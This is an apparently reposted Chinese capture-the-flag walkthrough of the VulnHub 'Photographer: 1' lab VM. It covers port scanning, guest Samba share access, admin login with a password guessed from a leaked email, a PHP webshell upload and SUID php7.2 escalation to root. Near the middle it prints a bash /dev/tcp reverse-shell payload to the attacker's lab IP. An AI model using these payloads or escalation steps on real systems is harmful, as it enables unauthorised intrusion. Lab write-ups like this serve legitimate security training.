【靶机测试--PHOTOGRAPHER: 1【php提权】】

news2024/10/6 2:27:28

前期准备

靶机下载地址:
https://vulnhub.com/entry/photographer-1%2C519/
在这里插入图片描述

信息收集

nmap 扫描同网段

┌──(root㉿kali)-[/home/test/桌面]
└─# nmap -sP 192.168.47.0/24 --min-rate 3333
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-19 07:37 CST
Nmap scan report for 192.168.47.1
Host is up (0.00030s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.47.2
Host is up (0.000058s latency).
MAC Address: 00:50:56:EC:64:22 (VMware)
Nmap scan report for 192.168.47.176
Host is up (0.000080s latency).
MAC Address: 00:0C:29:56:00:E7 (VMware)
Nmap scan report for 192.168.47.254
Host is up (0.000063s latency).
MAC Address: 00:50:56:FD:24:81 (VMware)
Nmap scan report for 192.168.47.156
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.36 seconds

得到靶机ip为
192.168.47.176

全面扫描靶机,查看开放的端口和服务

┌──(root㉿kali)-[/home/test/桌面]
└─# nmap -p- 192.168.47.176 -A -T4 --min-rate 2222
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-19 07:40 CST
Nmap scan report for 192.168.47.176
Host is up (0.00027s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18
|_http-title: daisa ahomi
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Koken 0.22.24
MAC Address: 00:0C:29:56:00:E7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: PHOTOGRAPHER, example.com

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2024-03-18T23:41:05
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: photographer
|   NetBIOS computer name: PHOTOGRAPHER\x00
|   Domain name: \x00
|   FQDN: photographer
|_  System time: 2024-03-18T19:41:05-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.47.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.51 seconds

可以看到开放了两个web服务一个是80端口,一个是8000端口;
还有139端口和445端口的Samba服务

Samba未授权

这里先不急着去看web服务,先看这个Samba服务是否有未授权访问

这里参考一个命令 crackmapexec
https://blog.csdn.net/Jack0610/article/details/131102720

┌──(root㉿kali)-[/home/test/桌面]
└─# crackmapexec smb 192.168.47.176 -u guest -p '' --shares
SMB         192.168.47.176  445    PHOTOGRAPHER     [*] Windows 6.1 (name:PHOTOGRAPHER) (domain:) (signing:False) (SMBv1:True)
SMB         192.168.47.176  445    PHOTOGRAPHER     [+] \guest: 
SMB         192.168.47.176  445    PHOTOGRAPHER     [+] Enumerated shares
SMB         192.168.47.176  445    PHOTOGRAPHER     Share           Permissions     Remark
SMB         192.168.47.176  445    PHOTOGRAPHER     -----           -----------     ------
SMB         192.168.47.176  445    PHOTOGRAPHER     print$                          Printer Drivers
SMB         192.168.47.176  445    PHOTOGRAPHER     sambashare      READ            Samba on Ubuntu
SMB         192.168.47.176  445    PHOTOGRAPHER     IPC$                            IPC Service (photographer server (Samba, Ubuntu))

或者直接在文件资源管理器中

smb://192.168.47.176

在这里插入图片描述

然后再利用,命令 smbclient进行下载

──(root㉿kali)-[/home/test/桌面]
└─# smbclient \\\\192.168.47.176\\sambashare
Password for [WORKGROUP\test]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jul 21 09:30:07 2020
  ..                                  D        0  Tue Jul 21 17:44:25 2020
  mailsent.txt                        N      503  Tue Jul 21 09:29:40 2020
  wordpress.bkp.zip                   N 13930308  Tue Jul 21 09:22:23 2020

                278627392 blocks of size 1024. 264268400 blocks available
smb: \> get mailsetn.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \mailsetn.txt
smb: \> get mailsent.txt
getting file \mailsent.txt of size 503 as mailsent.txt (70.2 KiloBytes/sec) (average 70.2 KiloBytes/sec)
smb: \> get wordpress.bkp.zip
getting file \wordpress.bkp.zip of size 13930308 as wordpress.bkp.zip (215933.3 KiloBytes/sec) (average 194347.3 KiloBytes/sec)
smb: \>

查看文件

┌──(root㉿kali)-[/home/test/桌面]
└─# cat mailsent.txt                                       
Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

解压一下zip

unzip xxx

应该是网站的cms

这时候打开web服务看一下

8000端口
在这里插入图片描述

80端口
在这里插入图片描述
左上角这个类似cms
在这里插入图片描述

搜索一下
searchsploit
在这里插入图片描述
确实存在
进行相应的exp下载和尝试利用

┌──(root㉿kali)-[/home/test/桌面/vul_photo/vul_test]
└─# searchsploit -m 37960.txt 37963.txt 37962.txt 37961.txt
  Exploit: Amateur Photographer's Image Gallery - 'force-download.php?File' Information Disclosure
      URL: https://www.exploit-db.com/exploits/37960
     Path: /usr/share/exploitdb/exploits/php/webapps/37960.txt
File Type: ASCII text, with very long lines (402)

Copied to: /home/test/桌面/vul_photo/vul_test/37960.txt


  Exploit: Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection
      URL: https://www.exploit-db.com/exploits/37963
     Path: /usr/share/exploitdb/exploits/php/webapps/37963.txt
File Type: ASCII text, with very long lines (402)

Copied to: /home/test/桌面/vul_photo/vul_test/37963.txt


  Exploit: Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting
      URL: https://www.exploit-db.com/exploits/37962
     Path: /usr/share/exploitdb/exploits/php/webapps/37962.txt
File Type: ASCII text, with very long lines (402)

Copied to: /home/test/桌面/vul_photo/vul_test/37962.txt


  Exploit: Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection
      URL: https://www.exploit-db.com/exploits/37961
     Path: /usr/share/exploitdb/exploits/php/webapps/37961.txt
File Type: ASCII text, with very long lines (402)

Copied to: /home/test/桌面/vul_photo/vul_test/37961.txt


                                                                                                                                           
┌──(root㉿kali)-[/home/test/桌面/vul_photo/vul_test]
└─# ls
37960.txt  37961.txt  37962.txt  37963.txt
                                                                                                                                           
┌──(root㉿kali)-[/home/test/桌面/vul_photo/vul_test]
└─# cat 37960.txt      
source: https://www.securityfocus.com/bid/56110/info

Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.

Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.

http://www.example.com/path_gallery/force-download.php?file=[RFD]

尝试访问 url/path_gallery/force-download.php
在这里插入图片描述
发现路径不存在,后续的目录都不存在(因为都有这个目录,访问不到)

能不能找到该网站的后台呢?

dirsearch 一下

┌──(root㉿kali)-[/home/test/桌面/vul_photo/vul_test]
└─# dirsearch -u http://192.168.47.176/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.47.176/-_24-03-19_08-41-26.txt

Error Log: /root/.dirsearch/logs/errors-24-03-19_08-41-26.log

Target: http://192.168.47.176/

[08:41:26] Starting: 
[08:41:27] 403 -  279B  - /.ht_wsr.txt                                     
[08:41:27] 403 -  279B  - /.htaccess.bak1                                  
[08:41:27] 403 -  279B  - /.htaccess.orig
[08:41:27] 403 -  279B  - /.htaccess.sample
[08:41:27] 403 -  279B  - /.htaccess.save
[08:41:27] 403 -  279B  - /.htaccess_extra
[08:41:27] 403 -  279B  - /.htaccess_orig
[08:41:27] 403 -  279B  - /.htaccess_sc
[08:41:27] 403 -  279B  - /.htaccessBAK                                    
[08:41:27] 403 -  279B  - /.htaccessOLD
[08:41:27] 403 -  279B  - /.htaccessOLD2
[08:41:27] 403 -  279B  - /.htm                                            
[08:41:27] 403 -  279B  - /.html
[08:41:27] 403 -  279B  - /.htpasswd_test
[08:41:27] 403 -  279B  - /.htpasswds
[08:41:27] 403 -  279B  - /.httr-oauth
[08:41:28] 403 -  279B  - /.php                                            
[08:41:38] 200 -    1KB - /assets/                                          
[08:41:38] 301 -  317B  - /assets  ->  http://192.168.47.176/assets/        
[08:41:43] 301 -  317B  - /images  ->  http://192.168.47.176/images/        
[08:41:43] 200 -    3KB - /images/                                          
[08:41:43] 200 -    6KB - /index.html                                       
[08:41:50] 403 -  279B  - /server-status                                    
[08:41:50] 403 -  279B  - /server-status/

在这里插入图片描述

后台登陆

尝试手动拼接
url/admin
在这里插入图片描述

成功找到一个8000端口的后台
在这里插入图片描述

数据配置信息

┌──(root㉿kali)-[/home/test/桌面/vul_photo/wordpress]
└─# cat wp-config-sample.php 
<?php
/**
 * As configurações básicas do WordPress
 *
 * O script de criação wp-config.php usa esse arquivo durante a instalação.
 * Você não precisa usar o site, você pode copiar este arquivo
 * para "wp-config.php" e preencher os valores.
 *
 * Este arquivo contém as seguintes configurações:
 *
 * * Configurações do MySQL
 * * Chaves secretas
 * * Prefixo do banco de dados
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** Configurações do MySQL - Você pode pegar estas informações com o serviço de hospedagem ** //
/** O nome do banco de dados do WordPress */
define( 'DB_NAME', 'nome_do_banco_de_dados_aqui' );

/** Usuário do banco de dados MySQL */
define( 'DB_USER', 'nome_de_usuario_aqui' );

/** Senha do banco de dados MySQL */
define( 'DB_PASSWORD', 'senha_aqui' );

/** Nome do host do MySQL */
define( 'DB_HOST', 'localhost' );

/** Charset do banco de dados a ser usado na criação das tabelas. */
define( 'DB_CHARSET', 'utf8' );

/** O tipo de Collate do banco de dados. Não altere isso se tiver dúvidas. */
define( 'DB_COLLATE', '' );

/**#@+
 * Chaves únicas de autenticação e salts.
 *
 * Altere cada chave para um frase única!
 * Você pode gerá-las
 * usando o {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org
 * secret-key service}
 * Você pode alterá-las a qualquer momento para invalidar quaisquer
 * cookies existentes. Isto irá forçar todos os
 * usuários a fazerem login novamente.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'coloque a sua frase única aqui' );
define( 'SECURE_AUTH_KEY',  'coloque a sua frase única aqui' );
define( 'LOGGED_IN_KEY',    'coloque a sua frase única aqui' );
define( 'NONCE_KEY',        'coloque a sua frase única aqui' );
define( 'AUTH_SALT',        'coloque a sua frase única aqui' );
define( 'SECURE_AUTH_SALT', 'coloque a sua frase única aqui' );
define( 'LOGGED_IN_SALT',   'coloque a sua frase única aqui' );
define( 'NONCE_SALT',       'coloque a sua frase única aqui' );

/**#@-*/

/**
 * Prefixo da tabela do banco de dados do WordPress.
 *
 * Você pode ter várias instalações em um único banco de dados se você der
 * um prefixo único para cada um. Somente números, letras e sublinhados!
 */
$table_prefix = 'wp_';

/**
 * Para desenvolvedores: Modo de debug do WordPress.
 *
 * Altere isto para true para ativar a exibição de avisos
 * durante o desenvolvimento. É altamente recomendável que os
 * desenvolvedores de plugins e temas usem o WP_DEBUG
 * em seus ambientes de desenvolvimento.
 *
 * Para informações sobre outras constantes que podem ser utilizadas
 * para depuração, visite o Codex.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Isto é tudo, pode parar de editar! :) */

/** Caminho absoluto para o diretório WordPress. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Configura as variáveis e arquivos do WordPress. */
require_once ABSPATH . 'wp-settings.php';

根据开始的mailsent.txt
可以猜测这里登录邮箱密码应该是

daisa@photographer.com
猜测密码:

my babygirl ;)
babygirl

上面的第二个密码可以成功登录
成功进入后台
在这里插入图片描述

下载shell.php
在这里插入图片描述

得到shell.php的内容

getshell

这里可能存在文件上传漏洞

在这里插入图片描述

在这里插入图片描述

不过下面这个接口不好测试

还有个文件上传接口
在这里插入图片描述

将鼠标放在上传好的文件上,就可以看到显现的文件路径,访问
在这里插入图片描述

成功rce
在这里插入图片描述

反弹shell

直接在hackbar中反弹shell,会有问题,使用bp抓包进行修改
在这里插入图片描述
在这里插入图片描述

payload

system("bash -c 'bash -i >& /dev/tcp/192.168.47.156/9999 0>&1'");

权限提升

成功反弹shell后,提升一下终端

www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ whoami
whoami
www-data
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ tty
tty
not a tty
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ which
which
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ which python
<www/html/koken/storage/originals/f5/29$ which python                        
/usr/bin/python
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ clear
clear
TERM environment variable not set.
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ python -m "pty;pty.spawn('/bin/bash')" 
<ginals/f5/29$ python -m "pty;pty.spawn('/bin/bash')"                        
/usr/bin/python: No module named pty;pty
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ pythono -c "import pty;pty.spawn('/bin/bash')"
<ginals/f5/29$ pythono -c "import pty;pty.spawn('/bin/bash')"                
No command 'pythono' found, did you mean:
 Command 'python' from package 'python-minimal' (main)
 Command 'python' from package 'python3' (main)
 Command 'python2' from package 'python-minimal' (main)
 Command 'python3' from package 'python3-minimal' (main)
pythono: command not found
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ ^[[A^[[D
</29$ pythono -c "import pty;pty.spawn('/bin/bash')"               
No command 'pythono' found, did you mean:
 Command 'python2' from package 'python-minimal' (main)
 Command 'python' from package 'python-minimal' (main)
 Command 'python' from package 'python3' (main)
 Command 'python3' from package 'python3-minimal' (main)
pythono: command not found
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ python -c "import pty;pty.spawn('/bin/bash')"
<ginals/f5/29$ python -c "import pty;pty.spawn('/bin/bash')"                 
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$ tty
tty
/dev/pts/8
www-data@photographer:/var/www/html/koken/storage/originals/f5/29$

ls -R
查看当下用户的所有文件

www-data@photographer:/home$ ls -R 
ls -R
.:
agi  daisa  lost+found

./agi:
Desktop    Downloads  Pictures  Templates  examples.desktop
Documents  Music      Public    Videos     share

./agi/Desktop:

./agi/Documents:

./agi/Downloads:

./agi/Music:

./agi/Pictures:

./agi/Public:

./agi/Templates:

./agi/Videos:

./agi/share:
mailsent.txt  wordpress.bkp.zip

./daisa:
Desktop    Downloads  Pictures  Templates  examples.desktop
Documents  Music      Public    Videos     user.txt

./daisa/Desktop:

./daisa/Documents:

./daisa/Downloads:

./daisa/Music:

./daisa/Pictures:

./daisa/Public:

./daisa/Templates:

./daisa/Videos:
ls: cannot open directory './lost+found': Permission denied
www-data@photographer:/home$

得到用户的flag

接下来就是提权

查看一下suid

www-data@photographer:/home/daisa$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/php7.2
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/chfn
/bin/ping
/bin/fusermount
/bin/mount
/bin/ping6
/bin/umount
/bin/su

suid提权–php提权

有个
/usr/bin/php7.2

去在线网站查看这个命令可以有哪些提权方式
参考文章:
https://blog.csdn.net/qq_74240553/article/details/135679410

https://gtfobins.github.io/

在这里插入图片描述

./php -r "pcntl_exec('/bin/sh', ['-p']);"
php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"

成功提权为root

ww-data@photographer:/home$ php7.2 -r "pcntl_exec('/bin/sh',['-p']);"
php7.2 -r "pcntl_exec('/bin/sh',['-p']);"
# whoami
whoami
root
# getuid
getuid
/bin/sh: 2: getuid: not found
# uid
uid
/bin/sh: 3: uid: not found
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
#

在这里插入图片描述
该靶机复现至此完成。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1528254.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数学建模软件及算法模型典型问题汇总

数学建模软件及算法模型典型问题汇总

一、 软件篇 编程、MATLAB&#xff08;物理建模&#xff09;、python&#xff08;数据分析&#xff09;、R、其他&#xff08;SPSS、Stata、Origin&#xff09; 这里其实还有一个 Lingo 软件&#xff0c;不过我不推荐&#xff0c;有更好的替代方案&#xff0c;就是 Yalmip 工…
阅读更多...
React的基本使用

React的基本使用

安装VSCode插件 ES7 Reactopen in browser React基本使用 基本使用步骤 引入两个JS文件&#xff08; 注意引入顺序 &#xff09; <!-- react库, 提供React对象 --> //本地 <script src"../js/react.development.js"></script> //线上 //<scr…
阅读更多...
理解和调试深度学习模型:探索人工智能可解释性方法

理解和调试深度学习模型:探索人工智能可解释性方法

关键要点 深度学习模型可能非常复杂&#xff0c;理解其内部原理可能具有挑战性在机器学习中&#xff0c;提供可解释性的方法有多种为了确保这些自动化系统的可靠性&#xff0c;可以使用可解释性工具来深入了解模型的决策过程模型不可知的可解释性工具在不同模型之间是模块化的…
阅读更多...
如何判断竞价托管代运营公司或SEM营销优化师水平高低

如何判断竞价托管代运营公司或SEM营销优化师水平高低

竞价托管代运营公司或营销优化师的能力评估需要从多个角度来考虑&#xff0c;通常有以下几种评估方式&#xff0c;一般来说&#xff0c;按照遨游建站多年经验来分析评估比较靠谱&#xff0c;对于不懂SEM的人来说也最适合&#xff0c;不需要许多专业的知识&#xff0c;也能判断出…
阅读更多...
深度强化学习05策略学习

深度强化学习05策略学习

蒙特卡洛近似 梯度上升 总结
阅读更多...
C语言项目:数组与函数实践:扫雷游戏

C语言项目:数组与函数实践:扫雷游戏

目录 目录&#xff1a; 1.扫雷游戏分析与设计 1.1扫雷游戏的功能说明&#xff1a; 1.1.1使用控制台实现经典扫雷的游戏 1.1.2游戏可以通过菜单实现继续玩或者退出游戏 1.1.3扫雷棋盘是9*9的格子 1.1.4默认随机布置10个雷 1.1.5 可以排查雷 2.扫雷游戏的代码实现 1.遇到的问题…
阅读更多...
Latex插入pdf图片,去除空白部分

Latex插入pdf图片,去除空白部分

目录 参考链接&#xff1a; 流程&#xff1a; 参考链接&#xff1a; ​科研锦囊之Latex-如何插入图片、表格、参考文献 http://t.csdnimg.cn/vpSJ3 流程&#xff1a; Latex的图片插入支持PDF文件&#xff0c;这里笔者建议都使用PDF文件进行图片的插入&#xff0c;因为PDF作…
阅读更多...
SinoDB数据库运行分析

SinoDB数据库运行分析

SinoDB数据库运行主要从数据库互斥资源等待、数据库写类型、备份文件有效性、Chunk状态等15个方向进行分析&#xff0c;具体说明如下&#xff1a; 一、数据库互斥资源等待 检查项目 数据库互斥资源等待 检查命令 onstat -g con |head -20 说明 onstat -g con 查看目前数据处…
阅读更多...
【C++练级之路】【Lv.14】二叉搜索树(进化的二叉树——BST)

【C++练级之路】【Lv.14】二叉搜索树(进化的二叉树——BST)

快乐的流畅&#xff1a;个人主页 个人专栏&#xff1a;《C语言》《数据结构世界》《进击的C》 远方有一堆篝火&#xff0c;在为久候之人燃烧&#xff01; 文章目录 引言一、二叉搜索树介绍二、二叉搜索树的模拟实现2.1 结点2.2 成员变量2.3 默认成员函数2.3.1 constructor2.3.2…
阅读更多...
汽车功能安全整体方法

汽车功能安全整体方法

摘 要 ISO26262道路车辆功能安全标准已经制定实践了多年&#xff0c;主要目标是应对车辆的电子和电气&#xff08;E/E&#xff09;系统失效。该方法践行至今&#xff0c;有些系统功能安全方法已经成熟&#xff0c;例如电池管理系统&#xff08;BMS&#xff09;&#xff0c;并且…
阅读更多...
MindGraph:文字生成知识图

MindGraph:文字生成知识图

欢迎来到MindGraph&#xff0c;这是一个概念验证、开源的、以API为先的基于图形的项目&#xff0c;旨在通过自然语言的交互&#xff08;输入和输出&#xff09;来构建和定制CRM解决方案。该原型旨在便于集成和扩展。以下是关于X的公告&#xff0c;提供更多背景信息。开始之前&a…
阅读更多...
每日OJ题_牛客HJ75 公共子串计算(IO型OJ)

每日OJ题_牛客HJ75 公共子串计算(IO型OJ)

目录 牛客HJ75 公共子串计算 解析代码 牛客HJ75 公共子串计算 公共子串计算_牛客题霸_牛客网 解析代码 #include <iostream> using namespace std; int main() {string str1 "", str2 "";cin >> str1 >> str2;int n1 str1.size()…
阅读更多...
【Selenium(一)】

【Selenium(一)】

简介 Selenium是一个开源的自动化测试工具&#xff0c;主要用于Web应用程序的自动化测试。它支持多种浏览器&#xff0c;包括Chrome、Firefox、Internet Explorer等&#xff0c;以及多种编程语言&#xff0c;如Java、Python、C#、Ruby等&#xff0c;使得它成为Web自动化测试中…
阅读更多...
一个用稳压二极与MOS管构成的过压保护电路

一个用稳压二极与MOS管构成的过压保护电路

一个用稳压二极与MOS管构成的过压保护电路 如图&#xff0c;利用稳压管和PMOS管组成一个保护电路&#xff0c;起过压保护和防反接的的作用。 分析&#xff1a; 1.当输入端是5V左右的电压的时候&#xff08;VDD-IN5V&#xff09;&#xff0c;稳压二极管D1没有被反向击穿&#…
阅读更多...
【异常处理】SpringMVC无法跳转视图问题

【异常处理】SpringMVC无法跳转视图问题

浏览器发送请求给控制器&#xff0c;但是结果是404报错&#xff0c;又试了一下返回json字符串&#xff0c;json可以获取到&#xff0c;所以应该springmvc出了问题。 查看controller&#xff0c;发现无法加载视图
阅读更多...
RealBasicVSR使用记录

RealBasicVSR使用记录

对各种场景图片、视频超分结果都很不错的模型。 paper&#xff1a;https://arxiv.org/pdf/2111.12704.pdf code&#xff1a;https://github.com/ckkelvinchan/RealBasicVSR 一、使用步骤 1. git clone https://github.com/ckkelvinchan/RealBasicVSR.git 2. 我的环境已安装…
阅读更多...
问界汽车提车全流程及注意点【伸手党福利】

问界汽车提车全流程及注意点【伸手党福利】

问界汽车提车全流程及注意点 目录 说明为没买车和没提车的小伙伴提供参考全程必须车主办理&#xff08;人必须在场&#xff09;&#xff0c;如果不是车主授权书很难办。时间&#xff1a;提车用时4小时&#xff0c;2个人 提车提前联系-交付专员做好需求调研当天-到店验车-千万不…
阅读更多...
并发编程Semaphore(信号量)浅析

并发编程Semaphore(信号量)浅析

目录 一、简介二、API三、使用3.1 demo13.1 demo2 四、适用场景 一、简介 Semaphore&#xff08;信号量&#xff09;是 Java 中用于控制同时访问特定资源的线程数量的工具类。Semaphore 维护了一组许可证&#xff0c;线程在访问资源之前必须先获取许可证&#xff0c;访问完毕后…
阅读更多...
前端 -- 基础 表单标签 -- 表单域

前端 -- 基础 表单标签 -- 表单域

表单域 # 表单域是一个包含 表单元素 的区域 在 HTML 标签中&#xff0c; <form> 标签 用于定义表单域&#xff0c; 以实现用户信息的收集和传递 简单通俗讲&#xff0c; 就是 <form> 会把它范围内的表单元素信息提交给后台&#xff08;服务器) 对于上面讲…
阅读更多...
1058:求一元二次方程

1058:求一元二次方程

【题目描述】 利用公式 求一元二次方程axbxc0的根&#xff0c;其中a不等于0。结果要求精确到小数点后5位。 【输入】 输入一行&#xff0c;包含三个浮点数a,b,c&#xff08;它们之间以一个空格分开&#xff09;&#xff0c;分别表示方程axbxc0的系数。 【输出】 输出一行&…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023